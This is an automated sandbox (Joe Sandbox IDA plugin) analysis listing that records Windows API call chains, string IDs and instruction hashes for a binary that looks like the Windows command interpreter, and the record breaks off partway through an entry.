                                      • Instruction ID: ea3943154b1f4061677e91a45b9d681a8c1871d91234b66dd6c3d4c912772969
                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction Fuzzy Hash: 74A1B4ABA0868382EE10AB55D0502B9E2A0FF85F98FC85535DA5E4B7C5DF7CF941C320
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memset$wcscmp
                                      • String ID: %s
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9A39
                                        • Part of subcall function 00007FF755CADF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF755CACEAA), ref: 00007FF755CADFB8
                                        • Part of subcall function 00007FF755CADF60: RtlFreeHeap.NTDLL ref: 00007FF755CADFCC
                                        • Part of subcall function 00007FF755CADF60: _setjmp.MSVCRT ref: 00007FF755CAE03E
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9AF0
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9B0F
                                        • Part of subcall function 00007FF755CA96E8: memset.MSVCRT ref: 00007FF755CA97B2
                                        • Part of subcall function 00007FF755CA96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA9880
                                      • _wcsupr.MSVCRT ref: 00007FF755CBB844
                                      • wcscmp.MSVCRT ref: 00007FF755CBB86D
                                      Strings
                                      Similarity
                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                      • String ID: FOR$ IF
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                      • String ID: %04X-%04X$:
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A73
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A91
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AB0
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AE3
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6B01
                                      Strings
                                      Similarity
                                      • API ID: wcschr$iswdigit
                                      • String ID: +-~!$<>+-*/%()|^&=,
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1673
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB168D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1757
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB176E
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1788
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB179C
                                      Similarity
                                      • API ID: Heap$Process$Alloc$Size
                                      • String ID:
                                      APIs
                                      Similarity
                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                      • String ID:
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Strings
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                      • String ID: KEYS$LIST$OFF
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: iswdigit
                                      • String ID: GeToken: (%x) '%s'
                                      APIs
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      APIs
                                      Similarity
                                      • API ID: memset$_setjmp
                                      • String ID:
                                      APIs
                                        • Part of subcall function 00007FF755CB33A8: iswspace.MSVCRT(?,?,00000000,00007FF755CCD6EE,?,?,?,00007FF755CC0632), ref: 00007FF755CB33C0
                                      • iswspace.MSVCRT(?,?,?,00007FF755CB32A4), ref: 00007FF755CB331C
                                      Strings
                                      Similarity
                                      • API ID: iswspace
                                      • String ID: off
                                      • API String ID: 2389812497-733764931
                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction ID: 003e8df3e1e5a76f5f506b14747cec06093b6e38b585308ec7815883466b07b5
                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction Fuzzy Hash: 782160ABE0C65381FB607B1A945427AE690EF45FA8FDCA234D94E47681DE2DEC418321
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: %s=%s$DPATH$PATH
                                      • API String ID: 3731854180-3148396303
                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction ID: c4fdd765b2e1f040bf6f1a3fe2525fb2297020acdc9872d76b99c0a780861842
                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction Fuzzy Hash: AE2192ABB0968780EE94AB55E440279A760AF84F88FCC6135C95E8B795DF6CE440C360
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspacewcschr
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                      • API String ID: 287713880-1183017076
                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction ID: de6d9d6c4937d021cb9490cb91b12b1917679e74c13a4f9605baae08714b5cd2
                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction Fuzzy Hash: 5AF044E7A1A69391EA609B01A440176F690FF44F98BCD9535D95D52254EF2CFC40C720
                                      APIs
                                        • Part of subcall function 00007FF755CB3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB3D0C
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D2F
                                        • Part of subcall function 00007FF755CB3C24: iswalpha.MSVCRT ref: 00007FF755CB3D4F
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D75
                                        • Part of subcall function 00007FF755CB3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3DBF
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6ABF
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6AD3
                                        • Part of subcall function 00007FF755CA6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B8B
                                        • Part of subcall function 00007FF755CA6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B97
                                        • Part of subcall function 00007FF755CA6B84: RtlFreeHeap.NTDLL ref: 00007FF755CA6BAF
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B39
                                        • Part of subcall function 00007FF755CA6B30: RtlFreeHeap.NTDLL ref: 00007FF755CA6B4D
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B59
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6B03
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6B17
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                      • String ID:
                                      • API String ID: 3512109576-0
                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction ID: e2e29dddf79685a0669c8b00c34458f5275703eb73b4fc790ccc3de5ac654ea5
                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction Fuzzy Hash: 94217FABE09A8385EB44AB65D4143B8BBA0EF59F49F9C8035C90E47391DF2CA4859370
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6D0
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6E7
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB701
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB715
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocSize
                                      • String ID:
                                      • API String ID: 2549470565-0
                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction ID: bb4999945fa7fc23a0d9fae186252f2c1128828b886c1d5c04d2522f79115e69
                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction Fuzzy Hash: E42133BBA09A8386EA55AB11E550078FAB1FF49F8CBCC9931DA4E43750DF7CE4418320
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                      • _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC37AA
                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CC37D2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                      • String ID:
                                      • API String ID: 22757656-0
                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction ID: 8dc6a51781427a159006b3de67ba451e841b3a3422554c9bfa056b53eb01da65
                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction Fuzzy Hash: 9111B6B6A1464687E7505B14E44837CBAA0F789F68FA84734D62D473D0CF3CD4458B10
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56C5
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC56D9
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56FD
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC5711
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction ID: be8f98a15f077e1babb13bb4fad0e8b64dd81286d9a8971edbef54ebac3dba06
                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction Fuzzy Hash: A6113AB6A04B81C6DB409F56E5040ADBBB0F74DF84B8D8125DB4E03718DF38E496C750
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CBEE64
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CBEE78
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                      • String ID:
                                      • API String ID: 2759988882-0
                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction ID: 4d959d48388af663785f28c653a4d9a026692cd9bc59ce1b42d60600849a91e8
                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction Fuzzy Hash: 6FF044AAA19F83C6EB8467659404178E9E1FF4EF55FCD8434CD0E86340EE3CA8448330
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID:
                                      • API String ID: 1606018815-0
                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction ID: a813bace02fdf04323dc030edafde04bd5fb603b6d02a8f93aa07aea353fdb0d
                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction Fuzzy Hash: 9EF01C7AA24A82CBD7446B10E844179FA60FFCAF06F88A234DA0B42394DF3CD0088B10
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitle
                                      • String ID: -
                                      • API String ID: 3358957663-3695764949
                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction ID: d0c1437fda6e52d8eccd0841e9f3eb6a89a70ddf35a280c5612929b16ce08be1
                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction Fuzzy Hash: AD3190ABA0864385EA05BB11A814078EAA4FB49FA8FDC5535DA0E177D5EF7CE841C324
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpswscanf
                                      • String ID: :EOF
                                      • API String ID: 1534968528-551370653
                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction ID: a338ac204efeab682d9f01ce4e6a564f7c1f5730d90bd022c0f100bf81e2da97
                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction Fuzzy Hash: 7E318EBBA08A4786EA54AB15A8402B8F2E1EF45F68FCC5131DE4D46291DF2CE8518760
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
